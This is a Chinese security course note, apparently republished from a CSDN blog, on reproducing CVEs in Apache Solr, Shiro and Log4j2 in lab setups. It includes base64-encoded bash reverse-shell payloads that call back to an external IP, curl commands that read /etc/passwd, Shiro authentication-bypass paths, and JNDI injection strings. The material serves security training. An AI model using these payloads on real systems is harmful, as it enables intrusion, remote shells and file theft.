0


服务攻防-开发组件安全&Solr搜索&Shiro身份&Log4j日志&本地CVE环境复现

知识点:
1、J2EE-组件安全-Solr-全文搜索
2、J2EE-组件安全-Shiro-身份验证
3、J2EE-组件安全-Log4J-日志记录

章节点:
1、目标判断-端口扫描&组合判断&信息来源
2、安全问题-配置不当&CVE漏洞&弱口令爆破
3、复现对象-数据库&中间件&开发框架&应用协议

常见语言开发框架:

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等 JAVA:Spring MyBatis
Hibernate Struts2 Springboot等 Python:Django Flask Bottle Turbobars
Tornado Web2py等 Javascript:Vue.js Node.js Bootstrap JQuery Angular等

常见语言开发组件:(Java)

Apache Solr、Apache Shiro、Apache Struts2、Apache
Flink、Flume、Dubbo、Redis、Logstash、ElasticSearch、Kafka、Ghidra、Minecraft、Apache
hive、Datax、Streaming、Dolphin Scheduler、Storm、Spring、Aibaba
FastJson、Jackson、Log4J、XSteam等。

一、演示案例-J2EE-组件Solr-本地demo&CVE

主要基于HTTP和Apache Lucene实现的全文搜索服务器。

黑盒特征:图标及端口8983
在这里插入图片描述
在这里插入图片描述

1、命令执行(CVE-2019-17558)

影响版本

  1. Apache Solr 5.0.0版本至8.3.1

利用项目

https://github.com/jas502n/solr_rce

  1. D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id

在这里插入图片描述

2、远程命令执行漏洞(CVE-2019-0193)

影响版本

  1. Apache Solr <8.2.0版本

https://vulhub.org/#/environments/solr/CVE-2019-0193/

条件1

  1. Apache Solr

  1. DataImportHandler

启用了模块

  1. DataImportHandler

(默认不会被启用)
在这里插入图片描述
在这里插入图片描述

条件2

  1. Solr Admin UI

未开启鉴权认证。(默认情况无需任何认证)
在这里插入图片描述
选择已有核心后选择

  1. Dataimport

功能并选择

  1. debug

模式,更改填入以下POC,点击

  1. Execute with this Confuguration
  1. <dataConfig><dataSource type="URLDataSource"/><script><![CDATA[functionpoc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document></dataConfig>

在这里插入图片描述
在这里插入图片描述

3、Apache Solr 文件读取&SSRF (CVE-2021-27905)

全版本官方拒绝修复漏洞

1、获取数据库名

  1. http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json

在这里插入图片描述
在这里插入图片描述

2、访问触发

  1. curl-i-s-k-X$'POST'\-H$'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}'\$'http://47.94.236.117:8983/solr/demo/config'

在这里插入图片描述

3、任意文件读取

  1. curl-i-s-k'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

在这里插入图片描述

二、演示案例-J2EE-组件Shiro-本地demo&CVE

Java安全框架,能够用于身份验证、授权、加密和会话管理。

  1. 黑盒特征:数据包cookie里面rememberMe
  2. 白盒审计:看调用的shiro库对应版本是否爆过漏洞

在这里插入图片描述

1、CVE_2016_4437 Shiro-550+Shiro-721(RCE)

影响范围

  1. Apache Shiro <=1.2.4

工具直接搜哈
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、CVE-2020-11989(身份认证绕过)

Poc:

  1. /admin/%20

影响范围:

  1. Apache Shiro < 1.7.1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、CVE-2020-1957(身份认证绕过)

Poc:

  1. /xxx/..;/admin/

影响范围:

  1. Apache Shiro < 1.5.3

在这里插入图片描述
在这里插入图片描述

4、CVE-2022-32532(身份验证绕过)

Poc:

  1. /permit/any
  1. /permit/a%0any

可绕过
需要依赖代码具体写法,无法自动化,风险较低。
影响范围:

  1. Apache Shiro < 1.9.1

三、演示案例-J2EE-组件Log4j-本地demo&CVE

Apache的一个开源项目,是一个基于Java的日志记录框架。

  1. 黑盒特征:盲打 会问蓝队攻击特征(${jndi:rmi:///osutj8})

Log4j2远程命令执行(CVE-2021-44228)

漏洞影响的产品版本包括:

  1. Apache Log4j2 2.0 - 2.15.0-rc1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

修复

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

1、生成反弹Shell的JNDI注入

  1. java-jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3Lzk5MDAgMD4mMQ==}|{base64,-d}|{bash,-i}"-A47.94.236.117

在这里插入图片描述
在这里插入图片描述

2、构造JNDI注入Payload提交

  1. ${jndi:rmi://47.94.236.117:1099/osutj8}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  1. %24%7b%6a%6e%64%69%3a%72%6d%69%3a%2f%2f%34%37%2e%39%34%2e%32%33%36%2e%31%31%37%3a%31%30%39%39%2f%6f%73%75%74%6a%38%7d

在这里插入图片描述
在这里插入图片描述

标签: 安全 solr log4j

本文转载自: https://blog.csdn.net/m0_60571842/article/details/135887848
版权归原作者 SuperherRo 所有, 如有侵权,请联系我们删除。

“服务攻防-开发组件安全&Solr搜索&Shiro身份&Log4j日志&本地CVE环境复现”的评论:

还没有评论